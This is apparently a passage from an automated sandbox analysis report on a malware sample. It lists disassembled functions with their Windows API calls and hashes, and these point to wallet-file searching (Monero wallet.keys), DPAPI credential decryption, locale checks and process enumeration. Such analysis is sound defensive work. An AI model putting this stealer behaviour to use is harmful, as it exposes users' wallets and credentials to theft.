                            • Instruction Fuzzy Hash: 3DB206F3A0C204AFE3046E2DEC8567ABBE9EFD4360F16463DE6C4C7744EA3558058696
                            Function 012B1FA4 Relevance: 11.6, Strings: 8, Instructions: 1628COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ._j]$9ty$H?=$Q}w$R~$aKO!$g;|$t@O{
                            • API String ID: 0-2911646462
                            • Opcode ID: b730aa2f57eacd9ae85f9ecc3f5926960bfcf09115d6d0eb5c2633fdedbc80ef
                            • Instruction ID: db0f056fd8dc2beecc54c100857b0807157bf964ee8239462449a6423a86f5ca
                            • Opcode Fuzzy Hash: b730aa2f57eacd9ae85f9ecc3f5926960bfcf09115d6d0eb5c2633fdedbc80ef
                            • Instruction Fuzzy Hash: 14B207F3A0C214AFE3046E2DEC8567AFBE9EB94720F16463DEAC4C7744E63558018796
                            Function 00E57D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,00E605B7), ref: 00E57D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E57D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E57D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E57DF2
                            • LocalFree.KERNEL32(00000000), ref: 00E57EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 7d0ab7dcec5e9ec5eab2cc96a5ee73dba2714e98d1bec2bf65006eadd6cf6110
                            • Instruction ID: dc747595ddc54eafdd600ffb20ef189cec09051e8da45cfc106fae34f1b6d2c8
                            • Opcode Fuzzy Hash: 7d0ab7dcec5e9ec5eab2cc96a5ee73dba2714e98d1bec2bf65006eadd6cf6110
                            • Instruction Fuzzy Hash: DD414271940218ABCB24DB94DC99BEEB7B4FF44701F1046E9E50A72281DB746F88CFA1
                            Function 00E4E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E60D79), ref: 00E4E5A2
                            • StrCmpCA.SHLWAPI(?,00E615F0), ref: 00E4E5F2
                            • StrCmpCA.SHLWAPI(?,00E615F4), ref: 00E4E608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4ECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 5ae87179fb2581b245fe0c7565de9ae4671a0886f75e68cea1ef5c11f75779c3
                            • Instruction ID: 2617c9df03b3ace8f1ce823c19044904d9d7fd43f0602d626c61ec07defc2bd9
                            • Opcode Fuzzy Hash: 5ae87179fb2581b245fe0c7565de9ae4671a0886f75e68cea1ef5c11f75779c3
                            • Instruction Fuzzy Hash: 101224716101185BCB14FB60DDA6AEDB3B9AF54301F485AF9F90A72191EE306B4CCF92
                            Function 00E4A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00E44F3E,00000000,?), ref: 00E4A251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 00E4A27A
                            • LocalFree.KERNEL32(?,?,?,?,00E44F3E,00000000,?), ref: 00E4A28F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: >O
                            • API String ID: 4291131564-1870091082
                            • Opcode ID: 64a565fb0cdc6a9a3ab64dcc3d6d12e53b5449ee655cf586fbe9ff05d965081e
                            • Instruction ID: f7b55182a8df51f916d3826f8bc3baf9e720900432b0b424849ad367d9ef63b8
                            • Opcode Fuzzy Hash: 64a565fb0cdc6a9a3ab64dcc3d6d12e53b5449ee655cf586fbe9ff05d965081e
                            • Instruction Fuzzy Hash: 7E11D474240308AFEB15CFA4D895FAA77B9EB88B14F208458FD159B3D0C7B2A941CB50
                            Function 012AB604 Relevance: 7.8, Strings: 5, Instructions: 1596COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "~{$Ql%I$`7Sm$b}/$m}
                            • API String ID: 0-2006350172
                            • Opcode ID: bb517060438c5ac1d2515f78ce3e83856b9313b9a9e4e318c83f41b11f81004d
                            • Instruction ID: 6dfa87953942e541823148ac76563692238d2e9c794385863690bb0887f0e638
                            • Opcode Fuzzy Hash: bb517060438c5ac1d2515f78ce3e83856b9313b9a9e4e318c83f41b11f81004d
                            • Instruction Fuzzy Hash: 22B2E4F3A082049FE3046E2DEC8577AFBE9EF94720F1A493DEAC4C7744E63558058696
                            Function 00EAF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction ID: 0a98aaa753290ca2094f5f71be59221da8c3a58bd9a54b3bce09894828d44898
                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction Fuzzy Hash: AE418212D19BD5C5CB058BB444A02EEBFB22FD6210F6D42EAC4DD1F382C774914AD3A5
                            Function 00E4C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C97C
                            • lstrcat.KERNEL32(?,00E60B47), ref: 00E4CA43
                            • lstrcat.KERNEL32(?,00E60B4B), ref: 00E4CA57
                            • lstrcat.KERNEL32(?,00E60B4E), ref: 00E4CA78
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 2512108ae4714a513e0a55451fe93ced0198b8d54e900f3d5005c04cd47924f7
                            • Instruction ID: 34ac8b09885ed26f2be89393a4bf5c03e7599cc57ef9aec0d7eb660505855c3b
                            • Opcode Fuzzy Hash: 2512108ae4714a513e0a55451fe93ced0198b8d54e900f3d5005c04cd47924f7
                            • Instruction Fuzzy Hash: C6414C7990421E9BDB24CFA0ED89BEEF7B8AB48304F1051A8E509A7284D7705A84DF91
                            Function 00E56BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00E56C0C
                            • sscanf.NTDLL ref: 00E56C39
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E56C52
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E56C60
                            • ExitProcess.KERNEL32 ref: 00E56C7A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 3485ff77a2bacafa23f9e3b62707f024b0b4590398a606669695939c45a743ca
                            • Instruction ID: 1642074409847153dd927334afb488c940189d51803b1d79344f7a6d8896fd46
                            • Opcode Fuzzy Hash: 3485ff77a2bacafa23f9e3b62707f024b0b4590398a606669695939c45a743ca
                            • Instruction Fuzzy Hash: C421EA75D00208ABCB18EFE4E9459EEB7B9BF48301F04852AF516B3254EB349648CB65
                            Function 00E472A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E472AD
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E472B4
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E472E1
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E47304
                            • LocalFree.KERNEL32(?), ref: 00E4730E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 7507a311a301270830b95125e11c73955862e7048a59587c718313c50b6f9c3e
                            • Instruction ID: 5c45a492070a016ac0c5f34a13bd71bc71306c51b874ba8ef41e9a4b872af574
                            • Opcode Fuzzy Hash: 7507a311a301270830b95125e11c73955862e7048a59587c718313c50b6f9c3e
                            • Instruction Fuzzy Hash: 13014C75A84308BBDB24DFE4DD46F9EB778AB44B00F104554FB15BB2C4D6B0AA408BA4
                            Function 00E59790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E597AE
                            • Process32First.KERNEL32(00E60ACE,00000128), ref: 00E597C2
                            • Process32Next.KERNEL32(00E60ACE,00000128), ref: 00E597D7
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 00E597EC
                            • CloseHandle.KERNEL32(00E60ACE), ref: 00E5980A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: ebd0acf7488b9f1690397e29e5ea3da3d560268894b3bd61e356b21d221afac0
                            • Instruction ID: d11633798be88f979b8ceb0649a898a04a75c972f18b2b9ecc71f2fe1a72c71b
                            • Opcode Fuzzy Hash: ebd0acf7488b9f1690397e29e5ea3da3d560268894b3bd61e356b21d221afac0
                            • Instruction Fuzzy Hash: 85011E75A10208EBDB28DFA5D944BEDB7B9BB08701F104599E909A7280D7349B84CF50
                            Function 00E64573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
